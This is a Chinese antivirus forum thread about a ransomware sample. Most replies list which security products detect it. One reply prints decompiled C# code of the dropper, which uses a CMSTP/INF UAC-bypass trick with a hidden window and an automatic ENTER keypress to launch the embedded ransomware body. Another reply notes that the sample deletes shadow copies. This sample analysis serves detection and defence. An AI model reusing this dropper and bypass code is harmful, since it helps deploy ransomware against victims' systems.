#Ransom

显示全部楼层 · 发表于 2021-2-8 16:28:13

https://www.virustotal.com/gui/f ... a37d4edf9/detection

显示全部楼层 · 发表于 2021-2-8 16:30:31

智量火绒

显示全部楼层 · 发表于 2021-2-8 16:32:53

卡巴阻止下载

显示全部楼层 · 发表于 2021-2-8 16:34:35

本帖最后由正在缓冲于 2021-2-8 16:35 编辑

avast、ESET、Microsoft Defender：Ransom:MSIL/FileCoder!MTB

显示全部楼层 · 发表于 2021-2-8 16:34:43

AVG

Win32:RansomX-gen [Ransom]

显示全部楼层 · 发表于 2021-2-8 16:36:35

本帖最后由 BitterLotus 于 2021-2-8 17:07 编辑

似乎只是勒索病毒释放器而已，没有主体，主体是在Windows\temp下的随机文件名.exe
这里是反编译出来的Main函数源码，GetResource就是获取并返回主体程序的源码

public static string BinaryPath = "c:\\windows\\system32\\cmstp.exe";
public static extern bool SetForegroundWindow(IntPtr hWnd);
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public static void Main()
{
try
{
string text = Environment.GetFolderPath(Environment.SpecialFolder.Windows) + "\\temp\" + Path.GetRandomFileName().Split(new char[]
{
Convert.ToChar(".")
})[0] + ".exe";
File.WriteAllBytes(text, CMSTPBypass.GetResource("3rt5bhzrahq"));
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append(CMSTPBypass.SetInfFile("cmd /c start "" + text + """));
Process.Start(new ProcessStartInfo(CMSTPBypass.BinaryPath)
{
Arguments = "/au " + stringBuilder.ToString(),
UseShellExecute = false,
CreateNoWindow = true,
WindowStyle = ProcessWindowStyle.Hidden
});
IntPtr value = 0;
value = IntPtr.Zero;
do
{
value = CMSTPBypass.SetWindowActive("cmstp");
}
while (value == IntPtr.Zero);
SendKeys.SendWait("{ENTER}");
}
catch
{
}
Environment.Exit(0);
}
private static byte[] GetResource(string file)
{
ResourceManager resourceManager = new ResourceManager("d3m0edrn1zd", Assembly.GetExecutingAssembly());
return (byte[])resourceManager.GetObject(file);
}
public static string SetInfFile(string CommandToExecute)
{
string value = Path.GetRandomFileName().Split(new char[]
{
Convert.ToChar(".")
})[0];
string value2 = Environment.GetFolderPath(Environment.SpecialFolder.Windows) + "\\temp";
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append(value2);
stringBuilder.Append("\");
stringBuilder.Append(value);
stringBuilder.Append(".inf");
StringBuilder stringBuilder2 = new StringBuilder(CMSTPBypass.InfData);
stringBuilder2.Replace("REPLACE_COMMAND_LINE", CommandToExecute);
File.WriteAllText(stringBuilder.ToString(), stringBuilder2.ToString());
return stringBuilder.ToString();
}
public static string SetInfFile(string CommandToExecute)
{
string value = Path.GetRandomFileName().Split(new char[]
{
Convert.ToChar(".")
})[0];
string value2 = Environment.GetFolderPath(Environment.SpecialFolder.Windows) + "\\temp";
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append(value2);
stringBuilder.Append("\");
stringBuilder.Append(value);
stringBuilder.Append(".inf");
StringBuilder stringBuilder2 = new StringBuilder(CMSTPBypass.InfData);
stringBuilder2.Replace("REPLACE_COMMAND_LINE", CommandToExecute);
File.WriteAllText(stringBuilder.ToString(), stringBuilder2.ToString());
return stringBuilder.ToString();
}
public static IntPtr SetWindowActive(string ProcessName)
{
Process[] processesByName = Process.GetProcessesByName(ProcessName);
if (processesByName.Length == 0)
{
return IntPtr.Zero;
}
processesByName[0].Refresh();
IntPtr intPtr = 0;
intPtr = processesByName[0].MainWindowHandle;
if (intPtr == IntPtr.Zero)
{
return IntPtr.Zero;
}
CMSTPBypass.SetForegroundWindow(intPtr);
CMSTPBypass.ShowWindow(intPtr, 5);
return intPtr;
}

复制代码

显示全部楼层 · 发表于 2021-2-8 16:41:30

Norton

显示全部楼层 · 发表于 2021-2-8 16:48:42

~56 engines detected this file / VT

显示全部楼层 · 发表于 2021-2-8 17:32:26

点击后马上加密，并删除阴影储存，但运行时没有看到留下勒索信

hybrid-analysis.com
Kaspersky Threat Intelligence Portal
ANY.RUN

显示全部楼层 · 发表于 2021-2-8 18:50:15

毒霸

下载时间: 2021-02-08 18:49:59
下载工具: 其他
文件路径: e:\浏览器下载\x.zip
病毒名: Win32.Troj.Undef.(kcloud)
操作结果: 已删除

复制代码

[病毒样本] #Ransom

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源